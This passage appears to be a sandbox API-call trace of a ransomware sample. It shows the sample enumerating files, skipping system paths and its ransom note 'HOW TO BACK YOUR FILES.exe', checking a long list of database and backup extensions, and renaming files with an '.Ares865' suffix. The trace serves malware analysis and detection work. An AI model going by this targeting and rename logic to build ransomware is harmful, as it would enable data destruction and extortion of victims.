phProv=0x2ccce04*=0x2f0518) returned 1 [0088.617] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.617] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0088.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0088.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.617] UnmapViewOfFile (lpBaseAddress=0x3030000) returned 1 [0088.627] CloseHandle (hObject=0x15c) returned 1 [0088.628] CloseHandle (hObject=0x118) returned 1 [0088.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.632] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6b688100, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6b688100, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x25360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XLINTL32.DLL.trx_dll", cAlternateFileName="XLINTL~1.TRX")) returned 1 [0088.632] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.632] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0088.632] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2=".") returned 1 [0088.632] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="..") returned 1 [0088.633] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="windows") returned 1 [0088.633] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="bootmgr") returned 1 [0088.633] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="temp") returned 1 [0088.633] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="pagefile.sys") returned 1 [0088.633] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="boot") returned 1 [0088.633] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="ids.txt") returned 1 [0088.633] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0088.633] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="perflogs") returned 1 [0088.633] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="MSBuild") returned 1 [0088.633] lstrlenW (lpString="XLINTL32.DLL.trx_dll") returned 20 [0088.633] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll") returned 71 [0088.633] lstrcpyW (in: lpString1=0x2cce468, lpString2="XLINTL32.DLL.trx_dll" | out: lpString1="XLINTL32.DLL.trx_dll") returned="XLINTL32.DLL.trx_dll" [0088.633] lstrlenW (lpString="XLINTL32.DLL.trx_dll") returned 20 [0088.633] lstrlenW (lpString="Ares865") returned 7 [0088.633] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0088.633] lstrlenW (lpString=".dll") returned 4 [0088.633] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2=".dll") returned 1 [0088.633] lstrlenW (lpString=".lnk") returned 4 [0088.633] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2=".lnk") returned 1 [0088.633] lstrlenW (lpString=".ini") returned 4 [0088.633] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2=".ini") returned 1 [0088.633] lstrlenW (lpString=".sys") returned 4 [0088.633] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2=".sys") returned 1 [0088.633] lstrlenW (lpString="XLINTL32.DLL.trx_dll") returned 20 [0088.633] lstrlenW (lpString="bak") returned 3 [0088.633] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0088.633] lstrlenW (lpString="ba_") returned 3 [0088.633] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0088.633] lstrlenW (lpString="dbb") returned 3 [0088.633] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0088.633] lstrlenW (lpString="vmdk") returned 4 [0088.634] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0088.634] lstrlenW (lpString="rar") returned 3 [0088.634] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0088.634] lstrlenW (lpString="zip") returned 3 [0088.634] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0088.634] lstrlenW (lpString="tgz") returned 3 [0088.634] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0088.634] lstrlenW (lpString="vbox") returned 4 [0088.634] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0088.634] lstrlenW (lpString="vdi") returned 3 [0088.634] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0088.634] lstrlenW (lpString="vhd") returned 3 [0088.634] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0088.634] lstrlenW (lpString="vhdx") returned 4 [0088.634] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0088.634] lstrlenW (lpString="avhd") returned 4 [0088.634] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0088.634] lstrlenW (lpString="db") returned 2 [0088.634] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0088.634] lstrlenW (lpString="db2") returned 3 [0088.634] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0088.634] lstrlenW (lpString="db3") returned 3 [0088.634] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0088.634] lstrlenW (lpString="dbf") returned 3 [0088.634] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0088.634] lstrlenW (lpString="mdf") returned 3 [0088.634] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0088.634] lstrlenW (lpString="mdb") returned 3 [0088.634] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0088.634] lstrlenW (lpString="sql") returned 3 [0088.634] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0088.634] lstrlenW (lpString="sqlite") returned 6 [0088.634] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0088.634] lstrlenW (lpString="sqlite3") returned 7 [0088.634] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0088.634] lstrlenW (lpString="sqlitedb") returned 8 [0088.634] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0088.635] lstrlenW (lpString="xml") returned 3 [0088.635] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0088.635] lstrlenW (lpString="$er") returned 3 [0088.635] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0088.635] lstrlenW (lpString="4dd") returned 3 [0088.635] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0088.635] lstrlenW (lpString="4dl") returned 3 [0088.635] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0088.635] lstrlenW (lpString="^^^") returned 3 [0088.635] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0088.635] lstrlenW (lpString="abs") returned 3 [0088.635] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0088.635] lstrlenW (lpString="abx") returned 3 [0088.635] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0088.635] lstrlenW (lpString="accdb") returned 5 [0088.635] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0088.635] lstrlenW (lpString="accdc") returned 5 [0088.635] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0088.635] lstrlenW (lpString="accde") returned 5 [0088.635] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0088.635] lstrlenW (lpString="accdr") returned 5 [0088.635] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0088.635] lstrlenW (lpString="accdt") returned 5 [0088.635] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0088.635] lstrlenW (lpString="accdw") returned 5 [0088.635] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0088.635] lstrlenW (lpString="accft") returned 5 [0088.635] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0088.635] lstrlenW (lpString="adb") returned 3 [0088.635] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.635] lstrlenW (lpString="adb") returned 3 [0088.635] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.635] lstrlenW (lpString="ade") returned 3 [0088.635] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0088.635] lstrlenW (lpString="adf") returned 3 [0088.635] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0088.635] lstrlenW (lpString="adn") returned 3 [0088.635] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0088.635] lstrlenW (lpString="adp") returned 3 [0088.636] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0088.636] lstrlenW (lpString="alf") returned 3 [0088.636] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0088.636] lstrlenW (lpString="ask") returned 3 [0088.636] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0088.636] lstrlenW (lpString="btr") returned 3 [0088.636] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0088.636] lstrlenW (lpString="cat") returned 3 [0088.636] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0088.636] lstrlenW (lpString="cdb") returned 3 [0088.636] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0088.636] lstrlenW (lpString="ckp") returned 3 [0088.636] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0088.636] lstrlenW (lpString="cma") returned 3 [0088.636] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0088.636] lstrlenW (lpString="cpd") returned 3 [0088.636] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0088.636] lstrlenW (lpString="dacpac") returned 6 [0088.636] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0088.636] lstrlenW (lpString="dad") returned 3 [0088.636] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0088.636] lstrlenW (lpString="dadiagrams") returned 10 [0088.636] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0088.636] lstrlenW (lpString="daschema") returned 8 [0088.636] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0088.636] lstrlenW (lpString="db-journal") returned 10 [0088.636] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0088.636] lstrlenW (lpString="db-shm") returned 6 [0088.636] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0088.638] lstrlenW (lpString="db-wal") returned 6 [0088.638] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0088.639] lstrlenW (lpString="dbc") returned 3 [0088.639] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0088.639] lstrlenW (lpString="dbs") returned 3 [0088.639] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0088.639] lstrlenW (lpString="dbt") returned 3 [0088.639] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0088.639] lstrlenW (lpString="dbv") returned 3 [0088.639] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0088.639] lstrlenW (lpString="dbx") returned 3 [0088.639] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0088.639] lstrlenW (lpString="dcb") returned 3 [0088.639] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0088.639] lstrlenW (lpString="dct") returned 3 [0088.639] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0088.639] lstrlenW (lpString="dcx") returned 3 [0088.639] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0088.639] lstrlenW (lpString="ddl") returned 3 [0088.639] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0088.639] lstrlenW (lpString="dlis") returned 4 [0088.639] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0088.639] lstrlenW (lpString="dp1") returned 3 [0088.639] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0088.639] lstrlenW (lpString="dqy") returned 3 [0088.639] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0088.639] lstrlenW (lpString="dsk") returned 3 [0088.639] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0088.639] lstrlenW (lpString="dsn") returned 3 [0088.639] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0088.639] lstrlenW (lpString="dtsx") returned 4 [0088.639] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0088.639] lstrlenW (lpString="dxl") returned 3 [0088.639] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0088.639] lstrlenW (lpString="eco") returned 3 [0088.639] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0088.639] lstrlenW (lpString="ecx") returned 3 [0088.639] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0088.639] lstrlenW (lpString="edb") returned 3 [0088.639] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0088.640] lstrlenW (lpString="epim") returned 4 [0088.640] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0088.640] lstrlenW (lpString="fcd") returned 3 [0088.640] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0088.640] lstrlenW (lpString="fdb") returned 3 [0088.640] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0088.640] lstrlenW (lpString="fic") returned 3 [0088.640] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0088.640] lstrlenW (lpString="flexolibrary") returned 12 [0088.640] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0088.640] lstrlenW (lpString="fm5") returned 3 [0088.640] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0088.640] lstrlenW (lpString="fmp") returned 3 [0088.640] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0088.640] lstrlenW (lpString="fmp12") returned 5 [0088.640] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0088.640] lstrlenW (lpString="fmpsl") returned 5 [0088.640] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0088.640] lstrlenW (lpString="fol") returned 3 [0088.640] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0088.640] lstrlenW (lpString="fp3") returned 3 [0088.640] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0088.640] lstrlenW (lpString="fp4") returned 3 [0088.640] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0088.640] lstrlenW (lpString="fp5") returned 3 [0088.640] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0088.640] lstrlenW (lpString="fp7") returned 3 [0088.640] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0088.640] lstrlenW (lpString="fpt") returned 3 [0088.640] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0088.640] lstrlenW (lpString="frm") returned 3 [0088.640] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0088.640] lstrlenW (lpString="gdb") returned 3 [0088.640] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.640] lstrlenW (lpString="gdb") returned 3 [0088.640] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.640] lstrlenW (lpString="grdb") returned 4 [0088.640] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0088.641] lstrlenW (lpString="gwi") returned 3 [0088.641] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0088.641] lstrlenW (lpString="hdb") returned 3 [0088.641] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0088.641] lstrlenW (lpString="his") returned 3 [0088.641] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0088.641] lstrlenW (lpString="ib") returned 2 [0088.641] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0088.641] lstrlenW (lpString="idb") returned 3 [0088.641] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0088.641] lstrlenW (lpString="ihx") returned 3 [0088.641] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0088.641] lstrlenW (lpString="itdb") returned 4 [0088.641] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0088.641] lstrlenW (lpString="itw") returned 3 [0088.641] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0088.641] lstrlenW (lpString="jet") returned 3 [0088.641] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0088.641] lstrlenW (lpString="jtx") returned 3 [0088.641] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0088.641] lstrlenW (lpString="kdb") returned 3 [0088.641] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0088.641] lstrlenW (lpString="kexi") returned 4 [0088.641] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0088.641] lstrlenW (lpString="kexic") returned 5 [0088.641] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0088.641] lstrlenW (lpString="kexis") returned 5 [0088.641] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0088.641] lstrlenW (lpString="lgc") returned 3 [0088.641] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0088.641] lstrlenW (lpString="lwx") returned 3 [0088.641] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0088.641] lstrlenW (lpString="maf") returned 3 [0088.641] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0088.641] lstrlenW (lpString="maq") returned 3 [0088.641] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0088.641] lstrlenW (lpString="mar") returned 3 [0088.641] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0088.641] lstrlenW (lpString="marshal") returned 7 [0088.642] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0088.642] lstrlenW (lpString="mas") returned 3 [0088.642] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0088.642] lstrlenW (lpString="mav") returned 3 [0088.642] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0088.642] lstrlenW (lpString="maw") returned 3 [0088.642] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0088.642] lstrlenW (lpString="mdbhtml") returned 7 [0088.642] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0088.642] lstrlenW (lpString="mdn") returned 3 [0088.642] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0088.642] lstrlenW (lpString="mdt") returned 3 [0088.642] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0088.642] lstrlenW (lpString="mfd") returned 3 [0088.642] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0088.642] lstrlenW (lpString="mpd") returned 3 [0088.642] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0088.642] lstrlenW (lpString="mrg") returned 3 [0088.642] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0088.642] lstrlenW (lpString="mud") returned 3 [0088.642] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0088.642] lstrlenW (lpString="mwb") returned 3 [0088.642] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0088.642] lstrlenW (lpString="myd") returned 3 [0088.642] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0088.642] lstrlenW (lpString="ndf") returned 3 [0088.642] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0088.642] lstrlenW (lpString="nnt") returned 3 [0088.642] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0088.642] lstrlenW (lpString="nrmlib") returned 6 [0088.642] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0088.642] lstrlenW (lpString="ns2") returned 3 [0088.642] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0088.642] lstrlenW (lpString="ns3") returned 3 [0088.642] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0088.642] lstrlenW (lpString="ns4") returned 3 [0088.642] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0088.642] lstrlenW (lpString="nsf") returned 3 [0088.642] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0088.643] lstrlenW (lpString="nv") returned 2 [0088.643] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0088.643] lstrlenW (lpString="nv2") returned 3 [0088.643] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0088.643] lstrlenW (lpString="nwdb") returned 4 [0088.643] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0088.643] lstrlenW (lpString="nyf") returned 3 [0088.643] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0088.643] lstrlenW (lpString="odb") returned 3 [0088.643] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.643] lstrlenW (lpString="odb") returned 3 [0088.643] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.643] lstrlenW (lpString="oqy") returned 3 [0088.643] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0088.643] lstrlenW (lpString="ora") returned 3 [0088.643] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0088.643] lstrlenW (lpString="orx") returned 3 [0088.643] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0088.643] lstrlenW (lpString="owc") returned 3 [0088.643] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0088.643] lstrlenW (lpString="p96") returned 3 [0088.643] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0088.643] lstrlenW (lpString="p97") returned 3 [0088.643] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0088.643] lstrlenW (lpString="pan") returned 3 [0088.643] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0088.643] lstrlenW (lpString="pdb") returned 3 [0088.643] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0088.643] lstrlenW (lpString="pdm") returned 3 [0088.643] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0088.643] lstrlenW (lpString="pnz") returned 3 [0088.643] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0088.643] lstrlenW (lpString="qry") returned 3 [0088.643] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0088.643] lstrlenW (lpString="qvd") returned 3 [0088.643] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0088.643] lstrlenW (lpString="rbf") returned 3 [0088.643] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0088.643] lstrlenW (lpString="rctd") returned 4 [0088.644] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0088.644] lstrlenW (lpString="rod") returned 3 [0088.644] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0088.644] lstrlenW (lpString="rodx") returned 4 [0088.644] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0088.644] lstrlenW (lpString="rpd") returned 3 [0088.644] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0088.644] lstrlenW (lpString="rsd") returned 3 [0088.644] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0088.644] lstrlenW (lpString="sas7bdat") returned 8 [0088.644] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0088.644] lstrlenW (lpString="sbf") returned 3 [0088.644] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0088.644] lstrlenW (lpString="scx") returned 3 [0088.644] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0088.644] lstrlenW (lpString="sdb") returned 3 [0088.644] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0088.644] lstrlenW (lpString="sdc") returned 3 [0088.644] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0088.644] lstrlenW (lpString="sdf") returned 3 [0088.644] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0088.644] lstrlenW (lpString="sis") returned 3 [0088.644] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0088.644] lstrlenW (lpString="spq") returned 3 [0088.644] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0088.644] lstrlenW (lpString="te") returned 2 [0088.644] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0088.644] lstrlenW (lpString="teacher") returned 7 [0088.644] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0088.644] lstrlenW (lpString="tmd") returned 3 [0088.644] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0088.644] lstrlenW (lpString="tps") returned 3 [0088.644] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0088.644] lstrlenW (lpString="trc") returned 3 [0088.644] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.644] lstrlenW (lpString="trc") returned 3 [0088.644] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.644] lstrlenW (lpString="trm") returned 3 [0088.644] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0088.645] lstrlenW (lpString="udb") returned 3 [0088.645] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0088.645] lstrlenW (lpString="udl") returned 3 [0088.645] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0088.645] lstrlenW (lpString="usr") returned 3 [0088.645] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0088.645] lstrlenW (lpString="v12") returned 3 [0088.645] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0088.645] lstrlenW (lpString="vis") returned 3 [0088.645] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0088.645] lstrlenW (lpString="vpd") returned 3 [0088.645] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0088.645] lstrlenW (lpString="vvv") returned 3 [0088.645] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0088.645] lstrlenW (lpString="wdb") returned 3 [0088.645] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0088.645] lstrlenW (lpString="wmdb") returned 4 [0088.645] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0088.645] lstrlenW (lpString="wrk") returned 3 [0088.645] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0088.645] lstrlenW (lpString="xdb") returned 3 [0088.645] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0088.645] lstrlenW (lpString="xld") returned 3 [0088.645] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0088.645] lstrlenW (lpString="xmlff") returned 5 [0088.645] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0088.645] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll.Ares865") returned 80 [0088.645] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0088.647] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all 